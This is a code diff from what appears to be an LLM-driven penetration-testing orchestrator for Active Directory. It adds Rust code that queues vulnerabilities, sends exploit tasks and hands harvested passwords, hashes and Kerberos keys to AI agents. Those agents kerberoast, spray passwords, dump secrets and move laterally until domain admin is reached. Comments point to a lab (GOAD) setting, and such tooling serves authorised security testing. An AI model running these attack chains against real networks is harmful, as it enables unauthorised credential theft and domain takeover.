!state.is_delegation_account(&c.username)) + } + }); + + if let Some(cred) = cred { + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } + + // For MSSQL vulns, include ALL available credentials for the domain + // so the LLM can try each one (different users have different MSSQL + // permissions — e.g. sam.wilson can EXECUTE AS LOGIN = 'sa'). + if vuln.vuln_type.starts_with("mssql") && !domain.is_empty() { + let all_creds: Vec<_> = state + .credentials + .iter() + .filter(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&c.username) + }) + .map(|c| { + json!({ + "username": c.username, + "password": c.password, + "domain": c.domain, + }) + }) + .collect(); + if all_creds.len() > 1 { + payload["all_credentials"] = json!(all_creds); + } + } + + // Also attach a hash if available for the account + if let Some(acct) = account_name { + if let Some(hash) = state + .hashes + .iter() + .find(|h| h.username.to_lowercase() == acct.to_lowercase()) + { + payload["hash"] = json!(hash.hash_value); + payload["hash_username"] = json!(hash.username); + if let Some(ref aes) = hash.aes_key { + payload["aes_key"] = json!(aes); + } + } + } + } + + let role = if vuln.recommended_agent.is_empty() { + "privesc" + } else { + &vuln.recommended_agent + }; + self.throttled_submit("exploit", role, payload, priority) + .await + } + + /// Submit a BloodHound collection task. + pub async fn request_bloodhound( + &self, + domain: &str, + dc_ip: &str, + credential: &ares_core::models::Credential, + ) -> Result> { + let payload = json!({ + "technique": "bloodhound_collect", + "domain": domain, + "target_ip": dc_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("recon", "recon", payload, 7).await + } + + /// Submit a delegation enumeration task. + pub async fn request_delegation_enum( + &self, + domain: &str, + dc_ip: &str, + credential: &ares_core::models::Credential, + ) -> Result> { + let payload = json!({ + "technique": "find_delegation", + "domain": domain, + "target_ip": dc_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("privesc_enumeration", "recon", payload, 5) + .await + } + + /// Submit a share enumeration task against a host using credentials. + pub async fn request_share_enumeration( + &self, + host_ip: &str, + credential: &ares_core::models::Credential, + ) -> Result> { + let payload = json!({ + "techniques": ["enumerate_shares"], + "target_ip": host_ip, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("recon", "recon", payload, 5).await + } + + /// Submit a share spider task. + pub async fn request_share_spider( + &self, + host_ip: &str, + share_name: &str, + credential: &ares_core::models::Credential, + ) -> Result> { + let payload = json!({ + "technique": "share_spider", + "target_ip": host_ip, + "share_name": share_name, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("credential_access", "credential_access", payload, 8) + .await + } + + /// Submit a coercion task. + pub async fn request_coercion( + &self, + target_ip: &str, + listener_ip: &str, + techniques: &[&str], + ) -> Result> { + let payload = json!({ + "target_ip": target_ip, + "listener_ip": listener_ip, + "techniques": techniques, + }); + self.throttled_submit("coercion", "coercion", payload, 3) + .await + } + + /// Submit a CERTIPY find task for ADCS enumeration. + pub async fn request_certipy_find( + &self, + target_ip: &str, + domain: &str, + credential: &ares_core::models::Credential, + ) -> Result> { + let payload = json!({ + "technique": "certipy_find", + "target_ip": target_ip, + "domain": domain, + "credential": { + "username": credential.username, + "password": credential.password, + "domain": credential.domain, + }, + }); + self.throttled_submit("recon", "recon", payload, 4).await + } + + /// Refresh the operation lock TTL. Called periodically. + pub async fn extend_lock(&self) -> Result<()> { + let op_id = self.state.operation_id().await; + self.queue.extend_lock(&op_id, self.config.lock_ttl).await?; + Ok(()) + } + + /// Publish a state update notification via Redis PubSub. + pub async fn notify_state_update(&self) -> Result<()> { + let op_id = self.state.operation_id().await; + self.queue.publish_state_update(&op_id).await?; + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/exploitation.rs b/ares-cli/src/orchestrator/exploitation.rs new file mode 100644 index 00000000..5bf0d79f --- /dev/null +++ b/ares-cli/src/orchestrator/exploitation.rs @@ -0,0 +1,196 @@ +//! Exploitation workflow — semaphore-gated exploit dispatch. +//! +//! Mirrors the Python `exploitation_workflow` background task that dequeues +//! vulnerabilities from a Redis ZSET and dispatches exploit tasks with +//! concurrency limited to 3 simultaneous exploits. + +use std::collections::HashMap; +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use redis::AsyncCommands; +use tokio::sync::{watch, Semaphore}; +use tokio::time::Instant; +use tracing::{debug, info, warn}; + +use ares_core::models::VulnerabilityInfo; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Cooldown before re-dispatching a failed exploit for the same vulnerability. +const EXPLOIT_RETRY_COOLDOWN: Duration = Duration::from_secs(120); + +/// Maximum concurrent exploit tasks. +const MAX_CONCURRENT_EXPLOITS: usize = 3; + +/// Spawn the exploitation workflow background task. +/// +/// Continuously pops vulnerabilities from the priority ZSET and dispatches +/// exploit tasks, respecting a semaphore limit. +pub async fn exploitation_workflow( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let semaphore = Arc::new(Semaphore::new(MAX_CONCURRENT_EXPLOITS)); + let mut interval = tokio::time::interval(Duration::from_secs(5)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Track dispatch times locally to allow retry after cooldown. + // Unlike `exploited_vulnerabilities` (permanent), this only prevents + // rapid re-dispatch within the same session. + let mut dispatched_at: HashMap = HashMap::new(); + + info!("Exploitation workflow started (max concurrent: {MAX_CONCURRENT_EXPLOITS})"); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Check if we have domain admin — stop exploiting once achieved + { + let state = dispatcher.state.read().await; + if state.has_domain_admin { + debug!("Domain admin achieved — exploitation workflow idle"); + continue; + } + } + + // Try to pop the highest-priority vuln from the ZSET + match pop_next_vuln(&dispatcher).await { + Ok(Some(vuln)) => { + // Skip delegation vulns — s4u.rs handles these with proper + // credential checking and lockout-aware dispatch. The generic + // exploitation path falls back to wrong credentials and + // produces LLM errors with missing target_spn. + { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype == "constrained_delegation" + || vtype == "unconstrained_delegation" + || vtype == "rbcd" + { + debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + "Skipping delegation vuln (handled by s4u automation)" + ); + continue; + } + } + + // Check if permanently marked exploited (set by result processing on success) + { + let state = dispatcher.state.read().await; + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + debug!(vuln_id = %vuln.vuln_id, "Already exploited, skipping"); + continue; + } + } + + // Check dispatch cooldown to prevent rapid re-dispatch + if let Some(last) = dispatched_at.get(&vuln.vuln_id) { + if last.elapsed() < EXPLOIT_RETRY_COOLDOWN { + // Still in cooldown — re-enqueue for later + let _ = requeue_vuln(&dispatcher, &vuln).await; + continue; + } + } + + // Acquire semaphore permit + let permit = match semaphore.clone().try_acquire_owned() { + Ok(p) => p, + Err(_) => { + // At capacity — re-enqueue and wait + let _ = requeue_vuln(&dispatcher, &vuln).await; + debug!("Exploit semaphore full, waiting"); + tokio::time::sleep(Duration::from_secs(2)).await; + continue; + } + }; + + let vuln_id = vuln.vuln_id.clone(); + let vuln_type = vuln.vuln_type.clone(); + let disp = dispatcher.clone(); + + // Record dispatch time for cooldown tracking + dispatched_at.insert(vuln_id.clone(), Instant::now()); + + // Spawn exploit task (does not block the main loop) + tokio::spawn(async move { + let _permit = permit; // held until this task completes + + match disp.request_exploit(&vuln, vuln.priority).await { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %vuln_id, + vuln_type = %vuln_type, + "Exploit dispatched" + ); + // Re-enqueue with lower priority so the vuln survives + // task failures. The cooldown timer prevents immediate + // re-dispatch, and mark_exploited (called on success in + // result_processing) prevents re-dispatch after success. + let mut retry_vuln = vuln.clone(); + retry_vuln.priority = (vuln.priority + 2).min(10); + let _ = requeue_vuln(&disp, &retry_vuln).await; + } + Ok(None) => { + debug!(vuln_id = %vuln_id, "Exploit deferred by throttler"); + // Re-enqueue for later + let _ = requeue_vuln(&disp, &vuln).await; + } + Err(e) => { + warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch exploit"); + let _ = requeue_vuln(&disp, &vuln).await; + } + } + }); + } + Ok(None) => { + // No vulns in queue + } + Err(e) => { + warn!(err = %e, "Failed to pop vulnerability from queue"); + } + } + } +} + +/// Pop the lowest-score (highest-priority) vulnerability from the ZSET. +async fn pop_next_vuln(dispatcher: &Dispatcher) -> Result> { + let key = dispatcher.state.vuln_queue_key().await; + let mut conn = dispatcher.queue.connection(); + + // ZPOPMIN returns the member with the lowest score + let result: Vec<(String, f64)> = redis::cmd("ZPOPMIN") + .arg(&key) + .arg(1) + .query_async(&mut conn) + .await + .unwrap_or_default(); + + match result.into_iter().next() { + Some((json, _score)) => { + let vuln: VulnerabilityInfo = + serde_json::from_str(&json).map_err(|e| anyhow::anyhow!("Bad vuln JSON: {e}"))?; + Ok(Some(vuln)) + } + None => Ok(None), + } +} + +/// Re-enqueue a vulnerability into the ZSET (e.g., after throttle rejection). +async fn requeue_vuln(dispatcher: &Dispatcher, vuln: &VulnerabilityInfo) -> Result<()> { + let key = dispatcher.state.vuln_queue_key().await; + let mut conn = dispatcher.queue.connection(); + let json = serde_json::to_string(vuln)?; + let score = vuln.priority as f64; + let _: () = conn.zadd(&key, &json, score).await?; + Ok(()) +} diff --git a/ares-cli/src/orchestrator/llm_runner.rs b/ares-cli/src/orchestrator/llm_runner.rs new file mode 100644 index 00000000..99a4d621 --- /dev/null +++ b/ares-cli/src/orchestrator/llm_runner.rs @@ -0,0 +1,372 @@ +//! LLM task runner — drives tasks through the Rust agent loop. +//! +//! Replaces the Python dreadnode Agent for LLM-driven tasks. +//! The runner builds prompts, calls the LLM, dispatches tool calls to +//! Python workers via Redis, and handles callbacks in Rust. + +use std::sync::{Arc, OnceLock}; + +use anyhow::Result; +use tracing::{debug, info, warn}; + +use ares_llm::prompt::templates; +use ares_llm::prompt::StateSnapshot; +use ares_llm::tool_registry::{self, AgentRole}; +use ares_llm::{ + run_agent_loop, AgentLoopConfig, AgentLoopOutcome, CallbackHandler, LlmProvider, LoopEndReason, + ToolDispatcher, +}; + +use crate::orchestrator::state::SharedState; + +// --------------------------------------------------------------------------- +// LLM task runner +// --------------------------------------------------------------------------- + +/// Drives LLM-powered tasks through the Rust agent loop. +/// +/// Owns an LLM provider and tool dispatcher, and builds prompts from +/// the current operation state. +#[allow(dead_code)] +pub struct LlmTaskRunner { + provider: Box, + model_name: String, + dispatcher: Arc, + state: SharedState, + config: AgentLoopConfig, + /// Deferred callback handler — set after construction to break the + /// `LlmTaskRunner → Dispatcher → LlmTaskRunner` circular dependency. + callback_handler: OnceLock>, +} + +impl LlmTaskRunner { + pub fn new( + provider: Box, + model_name: String, + dispatcher: Arc, + state: SharedState, + ) -> Self { + let config = AgentLoopConfig { + model: model_name.clone(), + ..AgentLoopConfig::default() + }; + Self { + provider, + model_name, + dispatcher, + state, + config, + callback_handler: OnceLock::new(), + } + } + + /// Set the callback handler after construction. + /// + /// This is safe to call from `&self` (interior mutability via `OnceLock`), + /// which lets us break the circular dependency: the handler needs the + /// `Dispatcher`, which itself holds an `Arc`. + pub fn set_callback_handler(&self, handler: Arc) { + let _ = self.callback_handler.set(handler); + } + + /// Execute a task through the LLM agent loop. + /// + /// This is the main entry point called by the orchestrator when + /// a task should be driven by the LLM rather than pushed to a + /// Python worker's full agent loop. + pub async fn execute_task( + &self, + task_type: &str, + task_id: &str, + role: AgentRole, + payload: &serde_json::Value, + ) -> Result { + let role_str = role.as_str(); + + // 1. Snapshot state (releases RwLock before LLM calls) + let snapshot = self.state.snapshot().await; + + // 2. Build system prompt from agent template + let system_prompt = build_system_prompt(role, &snapshot)?; + + // 3. Build task prompt from Tera template + payload + let task_prompt = build_task_prompt(task_type, task_id, payload, &snapshot)?; + + // 4. Get tool schemas for this role + let tools = tool_registry::tools_for_role(role); + + info!( + task_id = task_id, + task_type = task_type, + role = role_str, + tools = tools.len(), + "Starting LLM agent loop" + ); + + // 5. Run the agent loop + let outcome = run_agent_loop( + self.provider.as_ref(), + Arc::clone(&self.dispatcher), + &self.config, + &system_prompt, + &task_prompt, + role_str, + task_id, + &tools, + self.callback_handler.get().cloned(), + ) + .await; + + log_outcome(task_id, &outcome); + + Ok(outcome) + } +} + +// --------------------------------------------------------------------------- +// Prompt building helpers +// --------------------------------------------------------------------------- + +/// Build the system prompt for a given agent role. +fn build_system_prompt(role: AgentRole, snapshot: &StateSnapshot) -> Result { + // Get capabilities from the tool definitions for this role + let tools = tool_registry::tools_for_role(role); + let capabilities: Vec = tools + .iter() + .filter(|t| !tool_registry::is_callback_tool(&t.name)) + .map(|t| t.name.clone()) + .collect(); + + let template_name = match role { + AgentRole::Recon => templates::TEMPLATE_RECON, + AgentRole::CredentialAccess => templates::TEMPLATE_CREDENTIAL_ACCESS, + AgentRole::Cracker => templates::TEMPLATE_CRACKER, + AgentRole::Acl => templates::TEMPLATE_ACL, + AgentRole::Privesc => templates::TEMPLATE_PRIVESC, + AgentRole::Lateral => templates::TEMPLATE_LATERAL, + AgentRole::Coercion => templates::TEMPLATE_COERCION, + AgentRole::Orchestrator => templates::TEMPLATE_ORCHESTRATOR, + }; + + // Render system instructions (no per-role capability map for now) + let system_instructions = templates::render_system_instructions(None)?; + + // Render agent-specific instructions + let agent_instructions = templates::render_agent_instructions( + template_name, + &capabilities, + false, + &snapshot.undominated_forests, + )?; + + Ok(format!("{system_instructions}\n\n{agent_instructions}")) +} + +/// Build the task-specific prompt from payload and state. +fn build_task_prompt( + task_type: &str, + task_id: &str, + payload: &serde_json::Value, + snapshot: &StateSnapshot, +) -> Result { + // Use the PromptBuilder from ares-llm + let prompt = + ares_llm::prompt::generate_task_prompt(task_type, task_id, payload, Some(snapshot)); + + match prompt { + Some(p) => Ok(p), + None => { + warn!( + task_type = task_type, + task_id = task_id, + "No prompt template for task type, using raw payload" + ); + Ok(format!( + "## Task: {task_id}\n\nType: {task_type}\n\nPayload:\n```json\n{}\n```\n\nComplete this task and call `task_complete` with results.", + serde_json::to_string_pretty(payload).unwrap_or_default() + )) + } + } +} + +/// Map task type string to AgentRole. +pub fn role_for_task_type(task_type: &str) -> Option { + match task_type { + "recon" | "nmap" | "bloodhound" | "delegation_enum" | "certipy_find" => { + Some(AgentRole::Recon) + } + "credential_access" | "secretsdump" | "share_spider" | "kerberoast" | "asrep_roast" + | "password_spray" => Some(AgentRole::CredentialAccess), + "crack" => Some(AgentRole::Cracker), + "lateral" | "lateral_movement" => Some(AgentRole::Lateral), + "exploit" | "privesc_enumeration" => Some(AgentRole::Privesc), + "coercion" => Some(AgentRole::Coercion), + "acl_analysis" => Some(AgentRole::Acl), + "command" => None, // Command tasks go to whatever role is specified + _ => None, + } +} + +// --------------------------------------------------------------------------- +// Logging +// --------------------------------------------------------------------------- + +fn log_outcome(task_id: &str, outcome: &AgentLoopOutcome) { + match &outcome.reason { + LoopEndReason::TaskComplete { result, .. } => { + info!( + task_id = task_id, + steps = outcome.steps, + tool_calls = outcome.tool_calls_dispatched, + input_tokens = outcome.total_usage.input_tokens, + output_tokens = outcome.total_usage.output_tokens, + "Task completed via LLM: {result}" + ); + } + LoopEndReason::RequestAssistance { issue, .. } => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent requested assistance: {issue}" + ); + } + LoopEndReason::MaxSteps => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent hit max steps limit" + ); + } + LoopEndReason::EndTurn { content } => { + debug!( + task_id = task_id, + steps = outcome.steps, + "LLM agent ended turn: {content}" + ); + } + LoopEndReason::MaxTokens => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent hit max tokens" + ); + } + LoopEndReason::Error(err) => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent loop error: {err}" + ); + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_role_for_task_type_recon_variants() { + for tt in &[ + "recon", + "nmap", + "bloodhound", + "delegation_enum", + "certipy_find", + ] { + assert_eq!( + role_for_task_type(tt), + Some(AgentRole::Recon), + "Failed for: {tt}" + ); + } + } + + #[test] + fn test_role_for_task_type_credential_access_variants() { + for tt in &[ + "credential_access", + "secretsdump", + "share_spider", + "kerberoast", + "asrep_roast", + "password_spray", + ] { + assert_eq!( + role_for_task_type(tt), + Some(AgentRole::CredentialAccess), + "Failed for: {tt}" + ); + } + } + + #[test] + fn test_role_for_task_type_other_roles() { + assert_eq!(role_for_task_type("crack"), Some(AgentRole::Cracker)); + assert_eq!(role_for_task_type("lateral"), Some(AgentRole::Lateral)); + assert_eq!( + role_for_task_type("lateral_movement"), + Some(AgentRole::Lateral) + ); + assert_eq!(role_for_task_type("exploit"), Some(AgentRole::Privesc)); + assert_eq!( + role_for_task_type("privesc_enumeration"), + Some(AgentRole::Privesc) + ); + assert_eq!(role_for_task_type("coercion"), Some(AgentRole::Coercion)); + assert_eq!(role_for_task_type("acl_analysis"), Some(AgentRole::Acl)); + } + + #[test] + fn test_role_for_task_type_unmapped() { + assert_eq!(role_for_task_type("command"), None); + assert_eq!(role_for_task_type("unknown"), None); + assert_eq!(role_for_task_type(""), None); + } + + #[test] + fn test_build_system_prompt_all_roles() { + let snapshot = StateSnapshot::default(); + for role in &[ + AgentRole::Recon, + AgentRole::CredentialAccess, + AgentRole::Cracker, + AgentRole::Acl, + AgentRole::Privesc, + AgentRole::Lateral, + AgentRole::Coercion, + AgentRole::Orchestrator, + ] { + let result = build_system_prompt(*role, &snapshot); + assert!(result.is_ok(), "Failed for role: {:?}", role); + let prompt = result.unwrap(); + assert!(!prompt.is_empty(), "Empty prompt for role: {:?}", role); + } + } + + #[test] + fn test_build_task_prompt_known_types() { + let snapshot = StateSnapshot::default(); + let payload = serde_json::json!({ + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "techniques": ["nmap"] + }); + + let result = build_task_prompt("recon", "t-1", &payload, &snapshot); + assert!(result.is_ok()); + assert!(!result.unwrap().is_empty()); + } + + #[test] + fn test_build_task_prompt_unknown_type_falls_back() { + let snapshot = StateSnapshot::default(); + let payload = serde_json::json!({"foo": "bar"}); + + let result = build_task_prompt("unknown_type", "t-1", &payload, &snapshot); + assert!(result.is_ok()); + let prompt = result.unwrap(); + assert!(prompt.contains("unknown_type")); + assert!(prompt.contains("task_complete")); + } +} diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs new file mode 100644 index 00000000..0d9aa4da --- /dev/null +++ b/ares-cli/src/orchestrator/mod.rs @@ -0,0 +1,748 @@ +//! Ares Orchestrator — Rust-native orchestration loop. +//! +//! Startup sequence: +//! 1. Load config from env vars +//! 2. Connect to Redis +//! 3. Acquire the operation lock +//! 4. Load shared state from Redis +//! 5. Spawn background tasks: heartbeat monitor, result consumer, deferred +//! processor, cost summary, automation tasks, exploitation workflow, +//! discovery poller, state refresh +//! 6. Enter the main orchestration loop + +mod automation; +mod automation_spawner; +#[cfg(feature = "blue")] +mod blue; +mod bootstrap; +pub(crate) mod callback_handler; +mod completion; +mod config; +mod cost_summary; +mod deferred; +mod dispatcher; +mod exploitation; +mod llm_runner; +mod monitoring; +mod output_extraction; +mod recovery; +mod result_processing; +mod results; +mod routing; +mod state; +mod task_queue; +mod throttling; +mod tool_dispatcher; + +use std::sync::Arc; + +use anyhow::{Context, Result}; +use tokio::signal; +use tokio::sync::watch; +use tracing::{error, info, warn}; + +use self::automation_spawner::spawn_automation_tasks; +use self::bootstrap::{bootstrap_meta, dispatch_initial_recon}; +use self::config::OrchestratorConfig; +use self::cost_summary::spawn_cost_summary; +use self::deferred::DeferredQueue; +use self::dispatcher::Dispatcher; +use self::monitoring::{spawn_heartbeat_monitor, spawn_lock_keeper, AgentRegistry}; +use self::results::spawn_result_consumer; +use self::routing::ActiveTaskTracker; +use self::state::SharedState; +use self::task_queue::TaskQueue; +use self::throttling::Throttler; + +pub async fn run() -> Result<()> { + let _telemetry = ares_core::telemetry::init_telemetry( + ares_core::telemetry::TelemetryConfig::new("ares-orchestrator"), + ); + run_inner().await +} + +async fn run_inner() -> Result<()> { + info!( + version = env!("CARGO_PKG_VERSION"), + "ares-orchestrator starting" + ); + + // --- Blue-only mode: skip red orchestrator, just run blue investigation poller --- + #[cfg(feature = "blue")] + if std::env::var("ARES_BLUE_ONLY").as_deref() == Ok("1") { + return run_blue_only().await; + } + + let config = + Arc::new(OrchestratorConfig::from_env().context("Failed to load config from environment")?); + + // Load the YAML config (optional — provides agent definitions, vuln priorities, etc.) + let ares_config = match ares_core::config::AresConfig::from_env() { + Ok(cfg) => { + info!( + config_name = %cfg.operation.name, + agent_roles = cfg.agents.len(), + "Loaded YAML config" + ); + Some(Arc::new(cfg)) + } + Err(e) => { + info!("No YAML config loaded (using env vars only): {e}"); + None + } + }; + + info!( + operation_id = %config.operation_id, + max_concurrent = config.max_concurrent_tasks, + has_yaml_config = ares_config.is_some(), + "Configuration loaded" + ); + + let queue = TaskQueue::connect(&config.redis_url) + .await + .context("Failed to connect to Redis")?; + + let acquired = queue + .try_acquire_lock(&config.operation_id, config.lock_ttl) + .await?; + if !acquired { + anyhow::bail!( + "Operation {} is locked by another orchestrator", + config.operation_id + ); + } + + let shared_state = SharedState::new(config.operation_id.clone()); + shared_state + .load_from_redis(&queue) + .await + .context("Failed to load state from Redis")?; + + { + let mut state = shared_state.write().await; + if state.target_ips.is_empty() && !config.target_ips.is_empty() { + state.target_ips = config.target_ips.clone(); + info!( + target_domain = %config.target_domain, + target_ips = ?config.target_ips, + "Seeded target info from operation payload" + ); + } + // Seed target domain into state so automation tasks have it + if !config.target_domain.is_empty() { + let domain = config.target_domain.to_lowercase(); + if !state.domains.contains(&domain) { + state.domains.push(domain.clone()); + // Also persist to Redis + let domain_key = format!("ares:op:{}:domains", state.operation_id); + let mut conn = queue.connection(); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; + info!(domain = %domain, "Seeded target domain"); + } + + // Seed domain_controllers from target IPs so automation tasks + // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire + // immediately without waiting for recon to report back. + // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP. + if state.domain_controllers.is_empty() { + let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await; + if let Some(ref ip) = dc_ip { + let dc_key = format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + state.operation_id, + ares_core::state::KEY_DC_MAP, + ); + let mut conn = queue.connection(); + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await; + state.domain_controllers.insert(domain.clone(), ip.clone()); + info!( + domain = %domain, + dc_ip = %ip, + "Seeded domain controller from target IPs (port 88 probe)" + ); + + // Also register the credential's domain (may differ from target_domain, + // e.g., child.contoso.local vs contoso.local). + // This ensures automation tasks (spray, kerberoast) can find a DC + // for the credential's domain. + if let Some(ref cred) = config.initial_credential { + let cred_domain = cred.domain.to_lowercase(); + if cred_domain != domain && !cred_domain.is_empty() { + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip) + .await; + state + .domain_controllers + .insert(cred_domain.clone(), ip.clone()); + // Also add this domain to the domains set + if !state.domains.contains(&cred_domain) { + state.domains.push(cred_domain.clone()); + let domain_key = format!("ares:op:{}:domains", state.operation_id); + let _: Result<(), _> = redis::AsyncCommands::sadd( + &mut conn, + &domain_key, + &cred_domain, + ) + .await; + } + info!( + cred_domain = %cred_domain, + dc_ip = %ip, + "Also registered credential domain in DC map" + ); + } + } + } else { + warn!("No target IP responded on port 88/389 — DC will be discovered by recon"); + } + } + + // Seed placeholder hosts for ALL target IPs (matches Python startup). + // This ensures all IPs appear in the host list even before recon runs, + // and detect_dc() on service results can trigger domain extraction. + { + let host_key = format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + state.operation_id, + ares_core::state::KEY_HOSTS, + ); + let mut conn = queue.connection(); + for ip in &config.target_ips { + if !state.hosts.iter().any(|h| h.ip == *ip) { + let placeholder = ares_core::models::Host { + ip: ip.clone(), + hostname: String::new(), + os: String::new(), + roles: vec![], + services: vec![], + is_dc: false, + owned: false, + }; + let data = serde_json::to_string(&placeholder).unwrap_or_default(); + let _: Result<(), _> = + redis::AsyncCommands::rpush(&mut conn, &host_key, &data).await; + state.hosts.push(placeholder); + } + } + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &host_key, 86400i64).await; + info!( + count = config.target_ips.len(), + "Seeded placeholder hosts for all target IPs" + ); + } + } + } + + if let Some(ref cred) = config.initial_credential { + let credential = ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: cred.username.clone(), + password: cred.password.clone(), + domain: cred.domain.clone(), + source: "initial".to_string(), + discovered_at: Some(chrono::Utc::now()), + is_admin: false, + parent_id: None, + attack_step: 0, + }; + match shared_state.publish_credential(&queue, credential).await { + Ok(true) => info!( + username = %cred.username, + domain = %cred.domain, + "Seeded initial credential" + ), + Ok(false) => info!("Initial credential already exists (dedup)"), + Err(e) => warn!("Failed to seed initial credential: {e}"), + } + } + + // Write operation metadata to Redis so workers can discover us + bootstrap_meta(&queue, &config).await?; + + let tracker = ActiveTaskTracker::new(); + let registry = AgentRegistry::new(); + let throttler = Arc::new(Throttler::new(config.clone(), tracker.clone())); + let deferred = Arc::new(DeferredQueue::new(queue.clone(), config.clone())); + + // Priority: ARES_LLM_MODEL env var > config YAML agents.orchestrator.model + let model_spec = std::env::var("ARES_LLM_MODEL").ok().or_else(|| { + let config_path = std::env::var("ARES_CONFIG") + .unwrap_or_else(|_| "/ares/config/ares.yaml".to_string()); + std::fs::read_to_string(&config_path) + .ok() + .and_then(|content| { + let yaml: serde_yaml::Value = serde_yaml::from_str(&content).ok()?; + let model = yaml["agents"]["orchestrator"]["model"].as_str()?; + // Prefix with "openai/" if no provider prefix present + let spec = if model.contains('/') { + model.to_string() + } else { + format!("openai/{model}") + }; + info!(config = %config_path, model = %spec, "Model loaded from config YAML"); + Some(spec) + }) + }).context("No LLM model configured — set ARES_LLM_MODEL or agents.orchestrator.model in config YAML")?; + let (provider, model_name) = + ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?; + + // Credential auth throttle — prevents AD account lockout by rate-limiting + // auth-bearing tool calls per credential. Max 3 attempts per 30s window. + // GOAD lockout: 3 bad attempts / 30 min. With multiple concurrent agents, + // even correct passwords can fail if the account is already locked. + let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30)); + + // Choose tool dispatch strategy: + // ARES_TOOL_DISPATCH=local → in-process via ares_tools::dispatch() + // default → Redis queue for worker consumption (ares:tool_exec:{role}) + let tool_disp: Arc = + if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") { + info!("Tool dispatch: local (in-process via ares-tools)"); + Arc::new(tool_dispatcher::LocalToolDispatcher::new( + queue.clone(), + config.operation_id.clone(), + auth_throttle.clone(), + )) + } else { + info!("Tool dispatch: Redis queue (ares:tool_exec:{{role}})"); + Arc::new(tool_dispatcher::RedisToolDispatcher::new( + queue.clone(), + config.operation_id.clone(), + auth_throttle.clone(), + )) + }; + + let llm_runner = Arc::new(llm_runner::LlmTaskRunner::new( + provider, + model_name.clone(), + tool_disp, + shared_state.clone(), + )); + info!( + model = %model_name, + "LLM runner initialized — Rust drives all agent loops" + ); + + // --- Central dispatcher --- + let dispatcher = Arc::new(Dispatcher::new( + queue.clone(), + tracker.clone(), + throttler.clone(), + deferred.clone(), + shared_state.clone(), + config.clone(), + ares_config.clone(), + llm_runner.clone(), + )); + + // --- Wire orchestrator callback handler --- + // Deferred initialization: the handler needs the dispatcher, which contains + // the llm_runner, creating a circular dependency. OnceLock breaks the cycle. + let callback_handler = Arc::new( + callback_handler::OrchestratorCallbackHandler::new(shared_state.clone(), queue.clone()) + .with_dispatcher(dispatcher.clone()), + ); + llm_runner.set_callback_handler(callback_handler); + info!("Orchestrator callback handler wired (query + dispatch tools)"); + + // --- Shutdown signal --- + let (shutdown_tx, shutdown_rx) = watch::channel(false); + + // --- Spawn background tasks --- + + // Core infrastructure — lock keeper runs independently to prevent + // lock expiry even if heartbeat sweeps or Redis calls hang. + let lock_handle = spawn_lock_keeper(queue.clone(), config.clone(), shutdown_rx.clone()); + + let hb_handle = spawn_heartbeat_monitor( + queue.clone(), + registry.clone(), + tracker.clone(), + config.clone(), + shutdown_rx.clone(), + ); + + let (_result_handle, mut result_rx) = spawn_result_consumer( + queue.clone(), + tracker.clone(), + config.clone(), + shutdown_rx.clone(), + ); + + let deferred_handle = deferred::spawn_deferred_processor( + deferred.clone(), + dispatcher.clone(), + throttler.clone(), + config.clone(), + shutdown_rx.clone(), + ); + + let cost_handle = spawn_cost_summary(queue.clone(), config.clone(), shutdown_rx.clone()); + + // Exploitation workflow + let exploit_disp = dispatcher.clone(); + let exploit_shutdown = shutdown_rx.clone(); + let exploit_handle = tokio::spawn(async move { + exploitation::exploitation_workflow(exploit_disp, exploit_shutdown).await + }); + + // Discovery poller + let disc_disp = dispatcher.clone(); + let disc_shutdown = shutdown_rx.clone(); + let disc_handle = + tokio::spawn( + async move { result_processing::discovery_poller(disc_disp, disc_shutdown).await }, + ); + + // State refresh + let refresh_disp = dispatcher.clone(); + let refresh_shutdown = shutdown_rx.clone(); + let refresh_handle = + tokio::spawn( + async move { automation::state_refresh(refresh_disp, refresh_shutdown).await }, + ); + + // --- Automation tasks --- + let auto_handles = spawn_automation_tasks(dispatcher.clone(), shutdown_rx.clone()); + + // --- Blue team 